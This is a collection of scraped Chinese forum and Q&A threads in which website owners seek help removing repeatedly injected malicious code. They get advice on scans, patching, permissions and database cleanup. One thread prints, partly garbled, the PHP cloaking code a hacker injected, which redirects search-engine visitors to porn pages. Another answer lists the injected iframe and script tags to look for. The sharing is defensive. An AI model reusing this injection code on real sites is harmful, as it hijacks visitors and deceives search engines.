求救，救命，我网站被挂马了，跪求解决办法
瑞星卡卡安全论坛
15:00:00我网站最近中了个木马，扫也扫不出来。把程序文件全删除，换上以前做好的备份文件，马还是出来了 。马的地址是 求救，高人指点米经，不胜感激啊 。。:kaka4: :kaka4: 用户系统信息：Mozilla/4.0 ( MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
networkedition -
15:03:00这个地址失效了，有后门了吧。检查一下网站及源代码是否有漏洞:kaka6:& 可以扫描一个sreng日志发送上来诊断一下。
15:05:002楼大哥 ，啥叫 sreng啊 ，能教教我吗，我 小白菜
networkedition -
15:08:00使用System Repair Engineer扫描日志，将日志作为附件上传上来。下载页面：操作方法：1、下载后解压缩，运行SREngPS.EXE；2、如果无法打开尝试把SREngPS.EXE改名为，并复制到c:\windows目录下运行；3、依次点击【智能扫描】-【扫描】，耐心等待，扫描结束后点击【保存报告】；4、选择保存路径，文件名保持默认，直接点击【保存】；5、打开保存的日志文件SREngLOG.log，完整复制全部内容，新建一个文本文档，将日志中的全部内容粘贴到“新建文本文档.txt”中；6、将“新建文本文档.txt”作为附件上传，同时务必详细描述问题现象，如果有查杀不净的病毒务必提供病毒名和路径。注意：扫描前请尽量关闭QQ、游戏、下载工具、媒体播放器等应用程序
15:42:00好，多谢，我找时间去服务器上用这个先进的工具查查，找找，看找的到啥蛛丝马迹否。:kaka9: :kaka9: :kaka9:
夲號ヱ被ジ盜 -
16:12:00你网站地址是？
11:02:00还是不行啊.我拿正版的瑞星杀毒软件全盘杀毒,只杀了一个木马,然后拿360专杀工具杀毒,没任何影响.最后我拿我的本本接他们局域网进行杀毒，杀毒级别设置为最高，啥了几十个木马病毒出来 ，还是要弹出来IE拦截。网址是这个：我快绝望了。。今天又看 ，以前杀完毒的文件没有了，木马仍然存在，数据库仍然被黑被攻击。前时间改了公网IP地址，数据库没事了，域名一旦和真实 IP地址绑定，数据库ACCESS马上被黑被攻击。:kaka4: :kaka4: :kaka4:
11:03:00我本本装的是卡巴斯基2010版本，病毒库也是最新的 ，杀完以后以为已经搞定，结果还是没影响。。
11:13:00c盘也刚做了 系统不久，WINDOWS SERVER2003 SP2& 正版瑞星，360，都装齐全了 。DEF3个盘有3个影藏文件夹删不掉，叫 AutoRom.inf,& & & &
Desktop.ini,& & & & & & Folder.htt3个文件。后2个里面有2个文件 1个文件夹叫 免疫目录不要删 ，另一个文本文档叫说明，里面是什么本目录由中国安天实验室安全工具创建。网站已经全盘杀毒了，咋办哦 ，难道要我全盘都格完吗？万一木马程序在网站程序里，杀不掉，就算硬盘全格完，找不出木马，杀不死，全做无用功啊，高人指教啊 。:kaka4: :kaka4: :kaka4:
Enao2005 -
11:17:00按4楼说的，扫SRENG日志上来
岳麓山下 -
11:24:00不要心急，先按版主的要求将SREngLOG.log传上来，版主诊断后会给你进一步的意见，再按版主的要求一步一步进行清毒。我曾多次按版主的指导解决了很难缠的病毒。
networkedition -
16:59:00说了一堆也没有见日志，先扫描个日志上来。数据库是access，建议检查网页源代码是否有漏洞，尤其是和数据库交互的页面代码。还有web服务器的补丁都要打全等。
10:17:00这个，昨天扫描的 ，是这个吗？附件:
10:22:00昨天把服务器硬盘全格完了，重新装WINDOWS SERVER 2003 SP2，正版瑞星，360，全部补丁都打完，联想网御防火墙升级到最高。网站程序也拿瑞星，360 360专杀，卡巴2010杀过了，昨天晚上差不多熬了 1个通宵查看网站源程序，都没发现任何连接到那个网址的蛛丝马迹，发布到外网上，继续被攻击，继续被黑。
networkedition -
11:27:00日志未见异常，网站服务器是什么架构的？ 另外网站网址是什么？
zg1_2004 -
11:35:00该用户帖子内容已被屏蔽
11:39:00服务器直接接的联想网域防火墙PORT4端口， PORT2端口接的内网交换机，交换机接外网路由器，路由器接电信光纤。网址不方便说，这个见谅啊。
11:40:00在格式化服务器以前，这服务器就已经装过安天的那个啥产品了，照样没用 。
11:43:00我买的正版瑞星，原以为可以搞死这些东西，:kaka4: :kaka4: :kaka4:
12:01:00关键最最奇怪的是，我拿我本本（XP SP3 系统）装了网站，下的 卡巴，自己上，没问题，把服务器的网线直接接我的本本，外网访问我本本也没事，把网线接到刚做了系统的服务器上，马上又来了，难道WINDOWS2003系统不如XP SP3，难道XX不如 XX？？
查看完整版本:1&&/&&2&&页
跳转 0 ? parseInt(this.value) : 1) + '.aspx';}else{window.location='showtopic.aspx?topicid=8658985&page=' + (parseInt(this.value) > 0 ? parseInt(this.value) : 1) ;}}"" size="4" maxlength="9"
class="colorblue2"/>页
求救，救命，我网站被挂马了，跪求解决办法
初生襁褓狮
求救，救命，我网站被挂马了，跪求解决办法
我网站最近中了个木马，扫也扫不出来。把程序文件全删除，换上以前做好的备份文件，马还是出来了 。马的地址是 求救，高人指点米经，不胜感激啊 。。
用户系统信息：Mozilla/4.0 ( MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
帖子:36705
回复：求救，救命，我网站被挂马了，跪求解决办法
这个地址失效了，有后门了吧。检查一下网站及源代码是否有漏洞& 可以扫描一个sreng日志发送上来诊断一下。
威望：73175
贡献：1857
初生襁褓狮
回复：求救，救命，我网站被挂马了，跪求解决办法
2楼大哥 ，啥叫 sreng啊 ，能教教我吗，我 小白菜
帖子:36705
回复 3F 小李123 的帖子
使用System Repair Engineer扫描日志，将日志作为附件上传上来。下载页面：操作方法：1、下载后解压缩，运行SREngPS.EXE；2、如果无法打开尝试把SREngPS.EXE改名为，并复制到c:\windows目录下运行；3、依次点击【智能扫描】-【扫描】，耐心等待，扫描结束后点击【保存报告】；4、选择保存路径，文件名保持默认，直接点击【保存】；5、打开保存的日志文件SREngLOG.log，完整复制全部内容，新建一个文本文档，将日志中的全部内容粘贴到“新建文本文档.txt”中；6、将“新建文本文档.txt”作为附件上传，同时务必详细描述问题现象，如果有查杀不净的病毒务必提供病毒名和路径。注意：扫描前请尽量关闭QQ、游戏、下载工具、媒体播放器等应用程序
威望：73175
贡献：1857
初生襁褓狮
回复：求救，救命，我网站被挂马了，跪求解决办法
好，多谢，我找时间去服务器上用这个先进的工具查查，找找，看找的到啥蛛丝马迹否。
叱咤花甲狮
来自:昆仑琼华派
回复：求救，救命，我网站被挂马了，跪求解决办法
你网站地址是？
威望：11024
初生襁褓狮
回复：求救，救命，我网站被挂马了，跪求解决办法
还是不行啊.我拿正版的瑞星杀毒软件全盘杀毒,只杀了一个木马,然后拿360专杀工具杀毒,没任何影响.最后我拿我的本本接他们局域网进行杀毒，杀毒级别设置为最高，啥了几十个木马病毒出来 ，还是要弹出来IE拦截。网址是这个：我快绝望了。。今天又看 ，以前杀完毒的文件没有了，木马仍然存在，数据库仍然被黑被攻击。前时间改了公网IP地址，数据库没事了，域名一旦和真实 IP地址绑定，数据库ACCESS马上被黑被攻击。
初生襁褓狮
回复：求救，救命，我网站被挂马了，跪求解决办法
我本本装的是卡巴斯基2010版本，病毒库也是最新的 ，杀完以后以为已经搞定，结果还是没影响。。
初生襁褓狮
回复：求救，救命，我网站被挂马了，跪求解决办法
c盘也刚做了 系统不久，WINDOWS SERVER2003 SP2& 正版瑞星，360，都装齐全了 。DEF3个盘有3个影藏文件夹删不掉，叫 AutoRom.inf,& & & &
Desktop.ini,& & & & & & Folder.htt3个文件。后2个里面有2个文件 1个文件夹叫 免疫目录不要删 ，另一个文本文档叫说明，里面是什么本目录由中国安天实验室安全工具创建。网站已经全盘杀毒了，咋办哦 ，难道要我全盘都格完吗？万一木马程序在网站程序里，杀不掉，就算硬盘全格完，找不出木马，杀不死，全做无用功啊，高人指教啊 。
回复：求救，救命，我网站被挂马了，跪求解决办法
按4楼说的，扫SRENG日志上来
PM偶时请附上求助贴的地址...
威望：4347
1&&/&&2&&页
跳转 0 ? parseInt(this.value) : 1) + '.aspx';}else{window.location='showtopic.aspx?topicid=8658985&page=' + (parseInt(this.value) > 0 ? parseInt(this.value) : 1) ;}}"" size="4" maxlength="9"
class="colorblue2"/>页
论坛跳转...
热点专题 &&瑞星杀毒软件V16+ && &&V16+新引擎测试专区 &&瑞星路由安全卫士 &&瑞星安全随身WiFi &&瑞星个人防火墙V16 && &&广告过滤 &&路由系统内核漏洞 &&瑞星5000万豪礼积分活动专区 && &&北方区 && &&华东区 && &&华南区 && &&木马入侵拦截有奖体验专区 && &&瑞星2009版查杀引擎测试 && &&瑞星2009测试版问题反馈 && && &&瑞星杀毒软件2009公测 && && &&瑞星个人防火墙2009公测 && && &&瑞星全功能安全软件2009公测瑞星产品求助区 &&瑞星手机安全助手 &&瑞星杀毒软件2011、瑞星全功能安全软件 && &&瑞星全功能安全软件 &&瑞星个人防火墙2011 &&企业级安全产品 && &&瑞星企业终端安全管理系统 &&卡卡上网安全助手 &&瑞星安全助手 &&瑞星安全浏览器 &&瑞星其他产品 && &&瑞星软件管家 && &&瑞星加密盘 && &&账号保险柜5.0 && &&瑞星专业数据恢复技术交流区 &&反病毒/反流氓软件论坛 && &&菜鸟学堂 && &&安全技术讨论 &&恶意网站交流 && &&每日网马播报 && &&瑞星云安全网站联盟专版 &&入侵防御（HIPS） &&可疑文件交流 &&系统软件 && &&防火墙自定义规则 &&硬件交流综合娱乐区 &&Rising茶馆 &&影音贴图 &&情感小屋 &&体坛风云 &&活动专区 && &&实习生专区 && && &&实习生交流区 && && && &&实习生签到区 && && &&实习生考核区 && &&“安全之狮”校园行活动专版 && &&历史活动 && && &&论坛9周年活动专区 && && &&关注灾情 同心抗灾 &&瑞星安全游戏 && &&战将风云 && &&飘渺西游 && &&傲视天地 && &&凡人修真 && &&华人德州扑克 && &&天地英雄 && &&一球成名 && &&星际世界 && &&武林英雄 && &&神仙道 && &&赢家竞技 && &&盛世三国 && &&龙将 && &&梦幻飞仙 && &&斗破苍穹 && &&热血海贼王 && &&三国演义 && &&开天辟地 && &&仙落凡尘 && &&秦美人 && &&大侠传 && &&烈火战神 && &&神将三国 && &&街机三国 && &&龙回三国 && &&武尊 && &&绝代双骄 && &&攻城掠地 && &&女神联盟 && &&最无极 && &&剑影 && &&仙侠道 && &&风云无双 && &&傲视九重天 && &&深渊 && &&魅影传说 && &&热血屠龙 &&安全购物 && &&星迷论坛 && &&天天3·15本站站务区 &&站务 &&版主之家[限] && &&禁言禁访记录 &&待审核 &&瑞星客户俱乐部[限]查看: 4602|回复: 25
求助！第6次被挂马！/data/cache/cache_domain.php被反复挂马！
本帖最后由 wych999 于
10:49 编辑
事项：求助！被挂马！/data/cache/cache_domain.php被反复挂马！
描述：9月23日早上发现网站被挂马，除了首页顶部全是色情信息外，网站又被挂上了很多跳转性的色情信息（在百度搜索结果中点击后，直接跳转到色情网站上）。技术紧急排查，用discuz自带的安全工具，以及360挂马检测等各种办法，翻来覆去找不到被挂马的文件。9月25日晚终于发现被挂马的文件为：/data/cache/cache_domain.php 。之后，立即删除了该文件中被黑客添加的内容。但26日上午，再次发现该文件再次被挂马。替换文件大约4个小时后，再次发现该文件再被挂马。已经向公安部门报警。
加上9月27日凌晨和上午的两次挂马，5天内已经被6次被挂马了！继续寻求高手研究解决方案……
问题：cache_domain.php被反复挂马，如何彻底解决？cache_domain.php文件是缓存文件，难道还有另外一个相应的根文件被挂马了？如果是，那个文件是哪个？
附：黑客挂马的内容（第二次挂马时的内容，第一次的没有保存）
万恶的黑客在该文件下加上了如下内容：
function IsSpider(){
$ValidEntry=
If(strpos(strtolower($_SERVER['HTTP_USER_AGENT']),strtolower(&&)) & 0 or strpos
(strtolower($_SERVER['HTTP_USER_AGENT']),strtolower(&&)) & 0 or strpos(strtolower($_SERVER
['HTTP_USER_AGENT']),strtolower(&.hk&)) & 0 or strpos(strtolower($_SERVER
['HTTP_USER_AGENT']),strtolower(&&)) & 0)
&&$ValidEntry =
return $ValidE
function CheckRefresh(){
$ValidEntry=
If(strpos(strtolower($_SERVER['HTTP_REFERER']),strtolower(&&)) & 0 or strpos
(strtolower($_SERVER['HTTP_REFERER']),strtolower(&&)) & 0 or strpos(strtolower($_SERVER
['HTTP_REFERER']),strtolower(&.hk&)) & 0 or strpos(strtolower($_SERVER
['HTTP_REFERER']),strtolower(&&)) & 0)
&&$ValidEntry =
return $ValidE
if (!IsSpider())
if (CheckRefresh())
&&if ($_REQUEST[&20110&]&&&& or $_REQUEST[&dy1&]&&&& or $_REQUEST[&mei1&]&&&& or
$_REQUEST[&mei2&]&&&&)
Header(&Location: &.'/.index.htm?'.$_SERVER['SERVER_NAME']);
if ($_REQUEST[&d&]==&3&)
echo file_get_contents('/data/.sex/t.php');
//echo file_get_contents('/data/.sex/t.php');
是自己服务器吗？&&检查下文件是否被修改
头像被屏蔽
提示: 作者被禁止或删除 内容自动屏蔽
下砂 发表于
是自己服务器吗？&&检查下文件是否被修改
是自己的服务器。
刚才按照下砂的提示，进行了检查，目前还没有发现文件被修改。
下砂 发表于
是自己服务器吗？&&检查下文件是否被修改
目前采取的临时措施：
（1）cache/cache_domain.php文件guest不可写；
（2）cache/目录guest不可写
本帖最后由 wych999 于
10:53 编辑
wych999 发表于
目前采取的临时措施：
（1）cache/cache_domain.php文件guest不可写；
（2）cache/目录guest不可写
刚才发现再次被挂马！！！！！
看来采取的临时措施无效！！！！！
有时候不是被挂马，是你的模版有问题。网上有很多模版都会无辜的给你加代码的。
免费模块惹的祸吧，主机没有锁定功能吗，锁定了，万恶的黑客就没有办法了
随想、 发表于
免费模块惹的祸吧，主机没有锁定功能吗，锁定了，万恶的黑客就没有办法了
免费模块这个应该我们应该没有涉及啊，不过觉得提到的“主机锁定”听起来是个好思路，正在学习中……
Powered by求救，网站被百度说成百度风险提示，安全联盟提醒您：该页面可能被篡改！_百度知道
求救，网站被百度说成百度风险提示，安全联盟提醒您：该页面可能被篡改！
：该页面可能被篡改，检查过了啊已经提高反馈啊申诉有用啊？》就是这几天晚上更新文章到很晚，改了一下关键词和描述，安全联盟提醒您？请问怎me解决啊求救！怎么办啊，网站被百度说成百度风险提示，为什么给我这个啊？ 没有什么病毒啊
我有更好的答案
按默认排序
以及网站程序有无被增加恶意代码！ 找了安全公司，导致的百度提醒，大约三天就取消了提醒我网站之前也被百度安全联盟提醒了，修复网站漏洞后，有无被篡改，我的网站就是被黑客入侵了，说是被篡改了。 你检查下你网站的快照， 清除网站木马。如果对安全不懂的话，建议找专业的安全公司来解决，上传了黑链木马
一般是网站程序有漏洞，被heike入侵并上传了木马病毒，才导致的百度提示网站安全风险，真正解决问题的在于修复网站漏洞，清楚网站挂马，才能彻底的解决问题！如果程序不是很大，可以自己比对以前程序的备份文件，然后就是修复，或者换个服务器，最好是独立服务器。也可以通过安全公司来解决，国内也就Sinesafe和绿盟等安全公司 比较专业.
网站被挂马了，你自己找不到，请高人看下吧~
有收获！！非常感谢啊
其他类似问题
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁网站被挂马。求救！！！！！_百度知道
网站被挂马。求救！！！！！
360SE.gif" target="_blank">http！： <a href="http./x/style://www！！;C://www.360&#92.Program Files&#92.com/x/style:&#92.Exploit这是报毒的后显示的东西
那位大侠帮忙解决下
急.gif访问网页的进程：&360se3&#92：S病毒.ShellCode！访问地址
提问者采纳
我QQ加你 给你说了
你给我分啊
提问者评价
采纳率100%
其他类似问题
您可能关注的推广回答者：回答者：
挂马的相关知识
其他7条回答
用小红伞杀毒
中个小病毒有必要这么担忧吗？最坏情况也就重装下系统。用你的杀毒软件杀杀吧，推荐套杀毒配置给你，保证你以后百毒不侵。avast+360安全卫士。
清马+修补漏洞=彻底解决清马1、找挂马的标签，比如有&script language=&javascript& src=&网马地址&&&/script&或&iframe width=420 height=330 frameborder=0scrolling=auto src=网马地址&&/iframe&，或者是你用360或病杀毒软件拦截了网马网址。SQL数据库被挂马，一般是JS挂马。2、找到了恶意代码后，接下来就是清马，如果是网页被挂马，可以用手动清，也可以用批量清，网页清马比较简单，这里就不详细讲，现在着重讲一下SQL数据库清马，用这一句语句“update 表名 set 字段名=replace(字段名,&#39;aaa&#39;,&#39;&#39;)”， 解释一下这一句子的意思：把字段名里的内容包含aaa的替换成空，这样子就可以一个表一个表的批量删除网马。在你的网站程序或数据库没有备份情况下，可以实行以上两步骤进行清马，如果你的网站程序有备份的话，直接覆盖原来的文件即可。修补漏洞（修补网站漏洞也就是做一下网站安全。）1、修改网站后台的用户名和密码及后台的默认路径。2、更改数据库名,如果是ACCESS数据库，那文件的扩展名最好不要用mdb，改成ASP的，文件名也可以多几个特殊符号。3、接着检查一下网站有没有注入漏洞或跨站漏洞，如果有的话就相当打上防注入或防跨站补丁。4、检查一下网站的上传文件，常见了有欺骗上传漏洞，就对相应的代码进行过滤。5、尽可能不要暴露网站的后台地址，以免被社会工程学猜解出管理用户和密码。6、写入一些防挂马代码，让框架代码等挂马无效。7、禁用FSO权限也是一种比较绝的方法。8、修改网站部分文件夹的读写权限。9、如果你是自己的服务器，那就不仅要对你的网站程序做一下安全了，而且要对你的服务器做一下安全也是很有必要了！
不是被挂马，不用解决哦！！是你的电脑中标了。。。
加入瑞星的云安全网站联盟吧，会给你一个解决的方案和并对你的挂马情况进行数据分析，还能第一时间发现你网站挂马情况，第一时间提供预警信息
清马+修补漏洞。是不能解决问题的。空间安全性最重要。推荐使用安达互联。这个不错，我在用，我的很多客户买空间我都是给他们推荐安达互联。网址百度一下就知道了
先说下木马的清除：1.整站被挂马，最快速的恢复方法是，除开数据库、上传目录之外，替换掉其他所有文件；2.仔细检查网站上传目录存放的文件，很多木马伪装成图片保存在上传目录，你直接把上传文件夹下载到本地，用缩略图的形式，查看是不是图片，如果不显示，则一律删除；3.数据库里面存在木马，则把数据库的木马代码清除！可以采用查找替换；4.如果网站源文件没有，则需要FTP下载网站文件，然后再DW里面，用替换清除的方式一个个清除，注意网站的木马数，如果被挂了很多不同的，必须多多检查！再说如何防止网站挂马：对挂马网站或有病毒的网站的最好的防御工具，推荐广大站长加入瑞星云安全网站联盟，和百万站长群防群御！！
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁}